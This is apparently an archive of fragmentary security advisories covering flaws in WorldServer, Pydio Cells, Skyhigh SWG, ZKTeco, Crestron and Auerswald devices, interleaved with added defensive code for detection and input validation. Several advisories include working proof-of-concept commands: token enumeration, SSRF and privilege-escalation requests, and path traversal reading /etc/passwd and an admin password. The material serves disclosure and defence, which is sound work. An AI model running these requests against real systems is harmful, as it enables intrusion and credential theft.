[FD] [RT-SA-2023-001] Session Token Enumeration in RWS WorldServer
Advisory: Session Token Enumeration in RWS WorldServer

Session tokens in RWS WorldServer have low entropy and can be enumerated, leading to unauthorised access to user sessions.

Details
=======

Product: WorldServer
Affected Versions: 11.7.3 and earlier versions
Fixed Version: 11.8.0
Vulnerability Type: Session Token Enumeration
Security Risk: high
Vendor URL: https://www.rws.com/localization/products/additional-solutions/
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001
Advisory Status: published
CVE: CVE-2023-38357
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357

Introduction
============

"WorldServer offers a flexible, enterprise-class translation management system that automates translation tasks and greatly reduces the cost of supporting large volumes of local language content."
(from the vendor's homepage)

More Details
============

WorldServer associates user sessions with numerical tokens, which are always positive values below 2^31. The SOAP action "loginWithToken" allows a high number of parallel attempts to check whether a token is valid. During analysis, many assigned tokens were found to be in the 7-digit range. An attacker is therefore able to enumerate user accounts in only a few hours.
Proof of Concept
================

In the following, an example "loginWithToken" request is shown:

---
POST /ws/services/WSContext HTTP/1.1
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
Content-Length: 501
Host: www.example.com
Connection: close
User-Agent: agent

http://www.w3.org/2001/XMLSchema-instance"; xmlns:xsd="http://www.w3.org/2001/XMLSchema"; xmlns:soapenv="http://schemas.xmlsoap.org";>
http://schemas.xmlsoap.org/soap/encoding/";>
FUZZ
---

It can be saved as the file "login-soap.req" and used as a request template for the command-line HTTP enumerator monsoon [1] to issue many parallel requests:

---
$ monsoon fuzz --threads 100 \
    --template-file login-soap.req \
    --range 1-2147483647 \
    --hide-pattern "InvalidSessionException" \
    'https://www.example.com'
Target URL: https://www.example.com/

status   header   body   value     extract
   500      191    560   5829099
   500      191    556   6229259
   200      191   3702   7545136
   500      191    556   9054984
[...]
processed 1200 HTTP requests in 2h38m38s
4 of 1200 requests shown, 1225 req/s
---

The --range parameter reflects the possible value range of 2^31. For each value an HTTP request is sent to the WorldServer SOAP API, where the FUZZ marker in the request template is replaced with the respective value. Responses containing "InvalidSessionException" are hidden, as these sessions are invalid. Responses yield a status code of 200 if an administrative session token is found. For an unprivileged user session, status code 500 is returned.

Workaround
==========

Lower the rate at which requests can be issued, for example with a frontend proxy.

Fix
===

According to the vendor, upgrading to versions above 11.8.0 resolves the vulnerability.

Security Risk
=============

Attackers can efficiently enumerate session tokens. In a penetration test, it was possible to get access to multiple user accounts, including administrative accounts, using this method in under three hours.
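A detection rule for the enumeration described above, as an added example that is not part of the advisory: it replays constructed access-log lines (the line format is assumed) through a sliding window, flags a client whose "InvalidSessionException" failures on "loginWithToken" reach a threshold, and flags again when that client then receives a 200, i.e. has found a valid token.

```python
"""Flag loginWithToken enumeration bursts in WorldServer access logs.

Added example, not from the advisory. The log line format is constructed:
  <ISO-8601 UTC time> <client IP> <SOAP action> <HTTP status> <fault or '-'>
Real WorldServer logs differ; adapt parse_line() to the deployed format.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: 198.51.100.7 sweeps tokens and hits a valid one;
# 203.0.113.9 performs a single legitimate login.
SAMPLE_LOG = """\
2023-03-27T10:00:00Z 198.51.100.7 loginWithToken 500 InvalidSessionException
2023-03-27T10:00:00Z 198.51.100.7 loginWithToken 500 InvalidSessionException
2023-03-27T10:00:01Z 198.51.100.7 loginWithToken 500 InvalidSessionException
2023-03-27T10:00:01Z 203.0.113.9 loginWithToken 200 -
2023-03-27T10:00:02Z 198.51.100.7 loginWithToken 500 InvalidSessionException
2023-03-27T10:00:02Z 198.51.100.7 loginWithToken 200 -
2023-03-27T10:05:00Z 198.51.100.7 loginWithToken 500 InvalidSessionException
"""


def parse_line(line):
    """Split one constructed log line into (time, ip, action, status, fault)."""
    ts, ip, action, status, fault = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, action, int(status), fault


def detect_token_enumeration(log_text, window=timedelta(seconds=60), threshold=100):
    """Return alerts for clients brute-forcing session tokens.

    An "enumeration" alert fires once per burst when a client accumulates
    `threshold` InvalidSessionException responses within `window`; a
    "valid_token_after_burst" alert fires for every 200 response such a
    client receives while the burst is still active, i.e. a likely hijacked
    session that is worth invalidating.
    """
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    in_burst = set()
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, ip, action, status, fault = parse_line(raw)
        if action != "loginWithToken":
            continue
        recent = failures[ip]
        while recent and ts - recent[0] > window:   # slide the window forward
            recent.popleft()
        if len(recent) < threshold:
            in_burst.discard(ip)                    # burst has aged out
        if fault == "InvalidSessionException":
            recent.append(ts)
            if len(recent) >= threshold and ip not in in_burst:
                in_burst.add(ip)
                alerts.append({"ip": ip, "time": ts, "kind": "enumeration",
                               "failures": len(recent)})
        elif status == 200 and ip in in_burst:
            alerts.append({"ip": ip, "time": ts, "kind": "valid_token_after_burst",
                           "failures": len(recent)})
    return alerts


if __name__ == "__main__":
    # A threshold of 4 is far too low for production; it only makes the
    # short sample above trip the rule.
    for alert in detect_token_enumeration(SAMPLE_LOG, threshold=4):
        print(alert)
```

Feeding the rule the rate observed in the advisory (over a thousand requests per second from one client) makes the threshold choice easy; the second alert kind is the one that should trigger session invalidation.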
Additionally, by using such an administrative account it seems likely to be possible to execute arbitrary code on the underlying server by customising the REST API [2]. Thus, the vulnerability poses a high risk.

Timeline
========

2023-03-27 Vulnerability identified
2023-03-30 Customer approved disclosure to vendor
2023-04-03 Requested security contact from vendor
2023-04-06 Vendor responded with security contact
2023-04-14 Advisory sent to vendor
2023-04-18 Vendor confirms vulnerability and states that it was already known and fixed in version 11.8.0
2023-07-03 Customer confirms update to fixed version
2023-07-05 CVE ID requested
2023-07-15 CVE ID assigned
2023-07-19 Advisory released

References
==========

[1] https://github.com/RedTeamPentesting/monsoon
[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to sha
[FD] [RT-SA-2022-004] STARFACE: Authentication with Password Hash Possible
vulnerability was addressed with a temporary solution, such that the password hashes are encrypted before they are saved in the database. This approach prevents attackers from exploiting this vulnerability in scenarios where they have only acquired pure database access. However, attackers with system-level access can bypass this temporary measure, as they can extract the encryption key and decrypt the hashes in the database. A solution that fixes this vulnerability entirely is still in progress.

Security Risk
=============

The web interface and REST API of STARFACE allow logging in using the password hash instead of the cleartext password. This can be exploited by attackers who gained access to the application's database, where the passwords are saved as SHA512 hashes of the cleartext passwords. While the precondition for this attack could be the full compromise of the STARFACE PBX, another attack scenario could be that attackers acquire access to backups of the database stored on another system. Furthermore, the login via password hash allows attackers permanent unauthorised access to the web interface even if system access was obtained only temporarily. Due to the prerequisite of obtaining access to password hashes, the vulnerability poses a low risk only.

Timeline
========

2022-12-06 Vulnerability identified
2022-12-13 Customer approved disclosure to vendor
2023-01-11 Vendor notified
2023-05-04 Vendor released new version 8.0.0.11
2023-05-19 CVE ID requested
2023-05-20 CVE ID assigned
2023-06-01 Advisory released

References
==========

[0] https://starface.com/en/products/comfortphoning/
[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694
More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH                    Tel.: +49 241 510081-0
Alter Posthof 1                            Fax : +49 241 510081-99
52062 Aachen                               https://www.redteam-pentesting.de
Germany                                    Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] [RT-SA-2023-005] Pydio Cells: Server-Side Request Forgery
For longer-running processes, Pydio Cells allows the creation of jobs which are run in the background. The job "remote-download" can be used to cause the backend to send an HTTP GET request to a specified URL and save the response to a new file. The response file is then available in a user-specified folder in Pydio Cells.

Details
=======

Product: Pydio Cells
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Server-Side Request Forgery
Security Risk: medium
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005
Advisory Status: published
CVE: CVE-2023-32750
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750

Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration platform (DSC) specifically designed for organizations that need advanced document sharing and collaboration without security trade-offs or compliance issues."
(from the vendor's homepage)

More Details
============

Using the REST API of Pydio Cells it is possible to start jobs. For example, when renaming a file or folder, an HTTP request similar to the following is sent:

PUT /a/jobs/user/move HTTP/2
Host: example.com
User-Agent: agent
Accept: application/json
Authorization: Bearer G4ZRN[...]
Content-Type: application/json
Content-Length: 140

{
  "JobName": "move",
  "JsonParameters": "{\"nodes\":[\"cell/file.txt\"],\"target\":\"cell/renamed.txt\",\"targetParent\":false}"
}

The body contains a JSON object with a job name and additional parameters for the job. Besides the "move" job, a job with the name "remote-download" also exists. It takes two additional parameters: "urls" and "target". In the "urls" parameter, a list of URLs can be specified, and in the parameter "target" a path can be specified in which to save the response. When the job is started, HTTP GET requests are sent from the Pydio Cells server to the specified URLs.
The responses are saved into files, which are uploaded to the specified folder within Pydio Cells. Potential errors are transmitted over a WebSocket channel, which can be opened through the "/ws/event" endpoint.

Proof of Concept
================

Log into Pydio Cells and retrieve the JWT from the HTTP requests. Then, run the following commands to start a "remote-download" job to trigger an HTTP request:

$ export JWT=""
$ echo '{"urls": ["http://localhost:8000/internal.html"], "target": "personal-files"}' \
    | jq '{"JobName": "remote-download", "JsonParameters": (. | tostring)}' \
    | tee remote-download.json
$ curl --header "Authorization: Bearer $JWT" \
    --header 'Content-Type: application/json' \
    --request PUT \
    --data @remote-download.json 'https://example.com/a/jobs/user/remote-download'

The URL in the JSON document specifies which URL to request. The "target" field in the same document specifies into which folder the response is saved. Afterwards, the response is contained in a file in the specified folder. Potential errors are communicated through the WebSocket channel.

Workaround
==========

Limit the services which can be reached by the Pydio Cells server, for example using an outbound firewall.

Fix
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk
=============

The risk is highly dependent on the environment in which the attacked Pydio Cells instance runs. If there are any internal HTTP services which expose sensitive data on the same machine or within the same network, the server-side request forgery vulnerability could pose a significant risk. In other circumstances, the risk could be negligible. Therefore, the vulnerability is rated as a medium risk overall.
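The server-side check a "remote-download" style job should apply to the user-supplied "urls" before fetching anything, as an added example that is not Pydio Cells' own code: only http(s), no embedded credentials, an optional host allow-list, and every resolved address must be globally routable. The resolver is injectable (an assumption for offline testing); the constructed sample includes the advisory's localhost URL.

```python
"""Outbound URL validation for a "remote-download" style job.

Added example, not Pydio Cells' own code. It shows the server-side check a
job runner should perform before fetching a user-supplied URL: only http(s),
no embedded credentials, an optional host allow-list, and every resolved
address must be globally routable (no loopback, RFC 1918, link-local such as
the 169.254.169.254 cloud metadata address, or IPv4-mapped IPv6 tricks).
"""
import ipaddress
import socket
from urllib.parse import urlsplit


def _default_resolve(host):
    """Resolve host to all A/AAAA addresses (live DNS; replaced in tests)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _is_forbidden_ip(addr):
    """True if addr must never be fetched by the server on a user's behalf."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped          # ::ffff:127.0.0.1 is really 127.0.0.1
    # is_global is False for private, loopback, link-local, shared (100.64/10),
    # reserved and documentation ranges; multicast is checked separately.
    return (not ip.is_global) or ip.is_multicast


def validate_download_url(url, allowed_hosts=None, resolve=None):
    """Return the resolved addresses of url, or raise ValueError.

    resolve(host) -> list[str] is injectable so the check can be unit-tested
    offline; it defaults to a live getaddrinfo() lookup.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("URL has no host")
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        raise ValueError(f"host not on allow-list: {host}")
    try:
        addrs = [str(ipaddress.ip_address(host))]   # IP literal, no DNS needed
    except ValueError:
        addrs = (resolve or _default_resolve)(host)
    if not addrs:
        raise ValueError(f"could not resolve {host}")
    for addr in addrs:
        if _is_forbidden_ip(addr):
            raise ValueError(f"{host} resolves to forbidden address {addr}")
    # The caller should connect to one of the returned addresses and pin it
    # for the request rather than re-resolving, closing the DNS-rebinding gap.
    return addrs


def is_safe_download_url(url, **kwargs):
    """Boolean wrapper around validate_download_url()."""
    try:
        validate_download_url(url, **kwargs)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs; the localhost one mirrors the advisory's PoC URL.
    fake_dns = {"example.com": ["93.184.216.34"], "localhost": ["127.0.0.1"]}
    for u in ("http://localhost:8000/internal.html",
              "http://169.254.169.254/latest/meta-data/",
              "http://[::ffff:127.0.0.1]/",
              "file:///etc/passwd",
              "https://example.com/report.pdf"):
        ok = is_safe_download_url(u, resolve=lambda h: fake_dns.get(h, []))
        print(f"{'allow' if ok else 'block'}  {u}")
```

An outbound firewall, as the advisory's workaround suggests, remains the backstop: this check only narrows what the job will attempt to fetch.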
Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released

References
==========
[FD] [RT-SA-2023-004] Pydio Cells: Cross-Site Scripting via File Download
xss/xss.html");

The code has to be run in the context of Pydio Cells while being logged in. If the resulting URL is opened in a browser, the JavaScript code contained in the HTML file is run. If the attack is conducted in the described way, the JWT of the attacker is exposed through the URL. However, this can be circumvented by first generating a public URL for the file and then constructing the presigned URL based on the resulting download URL.

Workaround
==========

No workaround known.

Fix
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk
=============

Attackers that can upload files to a Pydio Cells instance can construct URLs that execute arbitrary JavaScript code in the context of Pydio Cells upon opening. This could, for example, be used to steal the authentication tokens of users opening the URL. It is likely that such an attack succeeds, since sharing URLs to files hosted using Pydio Cells is a common use case of the application. Therefore, the vulnerability is estimated to pose a high risk.

Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released

References
==========

[1] https://aws.amazon.com/sdk-for-javascript/
[FD] [RT-SA-2023-003] Pydio Cells: Unauthorised Role Assignments
"foobar", "Password": "hunter2", "Attributes": {"profile": "shared"}, "Roles": .}' \
    | tee create_user.json
{
  "Login": "foobar",
  "Password": "hunter2",
  "Attributes": {
    "profile": "shared"
  },
  "Roles": [...]
}

Finally, the following curl command can be issued to create the new external user:

$ curl --request PUT \
    --silent \
    --header "Authorization: Bearer $JWT" \
    --header 'Content-Type: application/json' \
    --data @create_user.json \
    https://example.com/a/user/foobar

Now, log in with the newly created user to access all cells and non-personal workspaces.

Workaround
==========

Disallow the creation of external users in the authentication settings.

Fix
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk
=============

Attackers with access to any regular user account of a Pydio Cells instance can extend their privileges by creating a new external user with all roles assigned. Subsequently, they can access all folders and files in any cell and workspace, except for personal workspaces. The creation of external users is activated by default. Therefore, the vulnerability is estimated to pose a high risk.

Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released

References
==========

[1] https://curl.se/
[2] https://stedolan.github.io/jq/
[FD] [RT-SA-2022-002] Skyhigh Security Secure Web Gateway: Cross-Site Scripting in Single Sign-On Plugin
As mentioned above, the HTTP response body could also include JavaScript code designed to interact with the domain specified in the URL, resulting in a cross-site scripting vulnerability.

Workaround
==========

None.

Fix
===

According to the vendor, the vulnerability is mitigated in versions 10.2.17, 11.2.6 and 12.0.1 of the Secure Web Gateway. This was not verified by RedTeam Pentesting GmbH. The vendor's security bulletin can be found at the following URL:

https://kcm.trellix.com/corporate/index?page=content&id=SB10393

Security Risk
=============

The vulnerability could be used to perform cross-site scripting attacks against users of the SWG in the context of any domain. Attackers only need to convince users to open a prepared URL or to visit an attacker's website that could perform an automatic redirect to an exploit URL. This exposes any website visited through the SWG to the various risks and consequences of a cross-site scripting vulnerability, such as account takeover. As a result, this vulnerability poses a high risk.

Timeline
========

2022-07-29 Vulnerability identified
2022-10-20 Customer approved disclosure to vendor
2022-10-20 Vulnerability was disclosed to the vendor
2023-01-17 Patch released by vendor for versions 10.2.17, 11.2.6 and 12.0.1
2023-01-26 Detailed advisory released by RedTeam Pentesting GmbH
[FD] [RT-SA-2021-003] Missing Authentication in ZKTeco ZEM/ZMM Web Interface
r-x root/root         0 2021-06-23 09:55 mnt/mtdblock/data/extlog.dat
rwxr-xr-x root/root   0 2013-05-04 01:28 mnt/mtdblock/data/extuser.dat
rwxr-xr-x root/root   0 1970-01-01 01:08 mnt/mtdblock/data/group.dat
rwxr-xr-x root/root   0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.dat
rwxr-xr-x root/root   0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.dat
rwxr-xr-x root/root 54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.dat
rwxr-xr-x root/root 33200 2021-06-23 07:23 mnt/mtdblock/data/sms.dat
rwxr-xr-x root/root   0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.dat
rwxr-xr-x root/root 660 2018-11-09 17:28 mnt/mtdblock/data/stkey.dat
rwxrwxrwx 500/5130    0 2013-05-04 01:28 mnt/mtdblock/data/template.dat
rwxr-xr-x root/root   0 1970-01-01 01:08 mnt/mtdblock/data/timezone.dat
rwxr-xr-x root/root   0 1970-01-01 01:08 mnt/mtdblock/data/transaction.dat
rwxr-xr-x root/root 952 2021-06-23 07:24 mnt/mtdblock/data/udata.dat
rwxr-xr-x root/root   0 1970-01-01 01:08 mnt/mtdblock/data/user.dat
rwxr-xr-x root/root   0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat
---

In this archive, the file "mnt/mtdblock/templatev10.dat" will likely contain fingerprints, and the file "mnt/mtdblock/ssruser.dat" contains the user database. The user database consists of 72-byte user records, each containing the privilege level, the PIN, the name of the user, data stored on external authentication tokens like cards, and the group of the user.

While the cookie value might be guessable, it is not used for authentication purposes. An attacker with knowledge of the corresponding URLs could access the user detail view or the backup without any authentication.

Proof of Concept
================

http://192.0.2.1/form/DataApp?style=1
http://192.0.2.1/form/DataApp?style=0
http://192.0.2.1/csl/user?did=0&uid=123

Workaround
==========

Network access to the device should be limited to trustworthy persons. This might be hard to implement if the device is installed in a public space, especially if it is also used for access control.
Fix
===

Currently, it is not known whether a newer version might fix this issue. Due to the age of the product, the vendor might decide not to create a fix at all.

Security Risk
=============

Attackers with network access to a ZKTeco ZEM/ZMM time attendance device can get access to employee data, including the credentials used for accessing the time attendance device. If these credentials are used for purposes other than time attendance, such as physical access control, attackers might use them to gain access to protected areas. The actual risk estimate varies wildly with the kind of access control system in place and whether network access to the device is prevented by other means, such as nearby security guards. For this reason, the missing authentication in the ZEM/ZMM web interface is estimated to pose a medium risk. This estimate might need to be adjusted to the specific use case of the device.

Timeline
========

2021-06-24 Vulnerability identified
2021-07-12 Customer approved disclosure to vendor
2021-07-16 Vendor notified
2021-08-20 Vendor provides fixed firmware
2022-09-29 Customer approved release of advisory
2022-10-10 CVE ID requested
2022-10-15 CVE ID assigned
2022-10-24 Advisory published

References
==========

https://zkteco.eu/company/history
[FD] [RT-SA-2021-009] Credential Disclosure in Web Interface of Crestron Device
Advisory: Credential Disclosure in Web Interface of Crestron Device

When the administrative web interface of the Crestron HDMI switcher is accessed unauthenticated, user credentials are disclosed which are valid to authenticate to the web interface.

Details
=======

Product: Crestron HD-MD4X2-4K-E
Affected Versions: 1.0.0.2159
Fixed Versions: -
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
Vendor Status: decided not to fix
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-009
Advisory Status: published
CVE: CVE-2022-23178
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23178

Introduction
============

"Crestron sets the gold standard for network security by leveraging the most advanced technologies including 802.1x authentication, AES encryption, Active Directory® credential management, JITC Certification, SSH, secure CIP, PKI certificates, TLS, and HTTPS, among others, to provide network security at the product level."
(from the vendor's homepage)

More Details
============

Upon visiting the device's web interface using a web browser, a login form is displayed, requiring a username and password to authenticate. The analysis of the sent HTTP traffic revealed that, in addition to loading the website, a few more HTTP requests are automatically triggered. One of the associated responses contains a username and a password which can be used to authenticate as the affected user.

Proof of Concept
================

Requesting the URL "http://crestron.example.com/" via a web browser results in multiple HTTP requests being sent. Among others, the following URL is requested:

http://crestron.example.com/aj.html?a=devi&_=[...]
This request results in a response similar to the following:

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-type: text/html

{
  "login_ur": 0,
  "front_val": [
    0,
    1
  ],
  "uname": "admin",
  "upassword": "password"
}

The values for the keys "uname" and "upassword" could be used to successfully authenticate to the web interface as the affected user.

Workaround
==========

Reachability over the network can be restricted for access to the web interface, for example by using a firewall.

Fix
===

No fix known.

Security Risk
=============

As user credentials are disclosed to visitors of the web interface, they can directly be used to authenticate to it. The access allows modifying the device's input and output settings as well as uploading and installing new firmware. Due to the ease of exploitation and the gain of administrative access, this vulnerability poses a high risk.

Timeline
========

2021-10-06 Vulnerability identified
2021-11-15 Customer approved disclosure to vendor
2021-12-08 Vendor notified
2021-12-15 Vendor notified again
2021-12-21 Vendor response received: "The device in question doesn't support Crestron's security practices. We recommend the HD-MD-4KZ alternative."
2021-12-22 Requested confirmation that the vulnerability will not be addressed
2021-12-28 Vendor confirms that the vulnerability will not be corrected
2022-01-12 Advisory released
[FD] [RT-SA-2021-007] Auerswald COMpact Multiple Backdoors
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]

{"logstatus":"Administrator"}

Workaround
==========

Disable or restrict access to the web-based management interface if possible.

Fix
===

Upgrade to a firmware version which corrects this vulnerability.

Security Risk
=============

By inspecting the firmware for the COMpact 5500R PBX, attackers can easily discover two backdoor passwords. One password is for the secret user account with the username "Schandelah", the other works as an alternative password for the user "Admin". Using the backdoor, attackers are granted access to the PBX with the highest privileges, enabling them to completely compromise the device. The passwords are derived from the serial number, the current date and the configured language. The backdoor passwords are not documented. They secretly coexist with a documented password recovery function supported by the vendor. No way was found to disable the backdoor access. All information needed to derive the passwords can be requested over the network without authentication, so attackers only require network access to the web-based management interface. Due to the ease of exploitation and severe consequences, the backdoor passwords are rated as a high risk.

Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-12-06 Advisory published

References
==========

[1] https://www.auerswald.de/de/support/download/firmware-compact-5500
[2] https://www.denx.de/wiki/U-Boot
[3] https://www.lighttpd.net
[4] https://ghidra-sre.org
[FD] [RT-SA-2021-006] Auerswald COMpact Arbitrary File Disclosure
$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'
HTTP/1.1 200 OK
X-XSS-Protection: 1
Content-Type: image/jpg; charset=UTF-8
Content-Length: 13986
Content-disposition: attachment; filename="logo1.jpg"
[...]

In a similar fashion as before, the file "/etc/passwd" can be accessed:

$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \
    'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'
HTTP/1.1 200 OK
[...]
root::0:0:root:/root:/bin/sh
netstorage::1:1::/data/ftpd:/bin/false
web::2:2::/opt/auerswald/lighttpd:/bin/false

For attackers, an interesting file is the SQLite [2] database file "/data/db/pbx4.db". It can be downloaded as follows:

$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\
    '192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \
    > pbx4.db
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  5120  100  5120    0     0  16253      0 --:--:-- --:--:-- --:--:-- 16305

This file contains the password for the highly privileged "Admin" user account:

$ sqlite3 pbx4.db
SQLite version 3.27.2 2019-02-25 16:06:06
Enter ".help" for usage hints.
sqlite> .tables
DbFileVersion  PbxMisc
sqlite> select * from PbxMisc;
[...]
AdminPasswdHash|
AdminLogin|Admin
AdminPin|43214321
AdminPasswd|S3kr1t!

The username and password can then be used to log into the web application:

$ curl --user 'Admin:S3kr1t!' --anyauth --include \
    https://192.168.1.2/tree
HTTP/1.1 200 OK
Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/
[...]
[{"login":3,"userId":0,"userName":"",[...]}]

Checking the access level reveals the new privilege:

$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \
    https://192.168.1.2/logstatus_state
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]
{"logstatus":"Administrator"}

The user "Admin", in contrast to regular administrative users ("sub-admin"),
can access more functions and for example apply firmware updates.

Workaround
==========

Disable or restrict access to the web-based management if possible.

Fix
===

Upgrade to a firmware version which corrects this vulnerability.

Security Risk
=============

Attackers who already have acquired administrative access as a so-called
"sub-admin" can download a database file and access the password for the
highly privileged "Admin" account. This account can use more functions and
is allowed to apply firmware updates. On the one hand, exploiting this
vulnerability already requires administrative access. On the other hand,
attackers can reach high-privileged access to the PBX and use functions not
available to "sub-admin" users, like firmware updates. All in all, this
vulnerability is therefore rated to have a medium risk potential.

Timeline
========

2021-08-26 Vulnerability identified
2021-09-01 Customer approved disclosure to vendor
2021-09-10 Vendor notified
2021-09-10 CVE ID requested
2021-09-10 CVE ID assigned
2021-10-05 Vendor provides access to device with fixed firmware
2021-10-11 Vendor provides fixed firmware
2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected
2021-12-06 Advisory published

References
==========

[1] https://curl.se
[2] https://www.sqlite.org
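The root cause of the disclosure above is that the "fileName" parameter is used to build a file system path without being confined to the logo directory, which is exactly what the "../../" sequences exploit. The following Python is an example added for this page, not Auerswald's firmware code: it shows the unsafe join beside a check that canonicalises the path and requires it to stay below the base directory. The directory "/srv/pbx/logos" and all function names are assumptions.

```python
import os
from urllib.parse import unquote


class PathTraversal(ValueError):
    """Raised when a requested file name would leave the logo directory."""


def unsafe_logo_path(base_dir: str, file_name: str) -> str:
    """The vulnerable pattern: the client-supplied name is joined onto the
    directory as-is, so "../" segments walk out of it (and an absolute
    name makes os.path.join drop base_dir entirely)."""
    return os.path.join(base_dir, file_name)


def safe_logo_path(base_dir: str, file_name: str) -> str:
    """Return the canonical path for file_name if, and only if, it resolves
    to a location below base_dir. The value is percent-decoded once first,
    because that is the form a web server hands to its handlers."""
    name = unquote(file_name)
    if "\x00" in name:
        raise PathTraversal("NUL byte in file name")
    if os.path.isabs(name):
        raise PathTraversal("absolute file names are not allowed")
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, name))
    # realpath() collapses "." and ".." and follows symlinks, so a
    # traversal shows up as a path that no longer has base_dir as a prefix.
    if os.path.commonpath([root, candidate]) != root:
        raise PathTraversal(f"{file_name!r} resolves outside {base_dir}")
    return candidate


def is_traversal(base_dir: str, file_name: str) -> bool:
    """True when safe_logo_path() refuses the name."""
    try:
        safe_logo_path(base_dir, file_name)
    except PathTraversal:
        return True
    return False


if __name__ == "__main__":
    base = "/srv/pbx/logos"  # assumed location, not taken from the device
    for name in ("logo1.jpg", "../../etc/passwd", "../../data/db/pbx4.db",
                 "..%2F..%2Fetc%2Fpasswd", "/etc/passwd"):
        verdict = "rejected" if is_traversal(base, name) else safe_logo_path(base, name)
        print(f"{name:24} unsafe join: {unsafe_logo_path(base, name)}")
        print(f"{'':24} checked:     {verdict}")
```

The check deliberately runs on the resolved path rather than on the raw string: rejecting the substring ".." alone misses absolute names, percent-encoded variants and symlinks, while a prefix comparison of two canonical paths covers all of them.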
[FD] [RT-SA-2021-005] Auerswald COMpact Privilege Escalation
QBGDRFJB' --include \
  'https://192.168.1.2/teilnehmer_profil_einzel_state?tnId=1234'
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8;
[...]
{"rufnr":"123","name":"Example User",[...],
"privatPin":"XX","privatPass":"XX","privatToken":"XX",
[...], "isSubadmin":0,[...]}

In the returned JSON document, the values of the fields for the PIN, token
and password are replaced by "XXX". But if the URL parameter "passwd" is set
to the value 1, the values are returned in plain text:

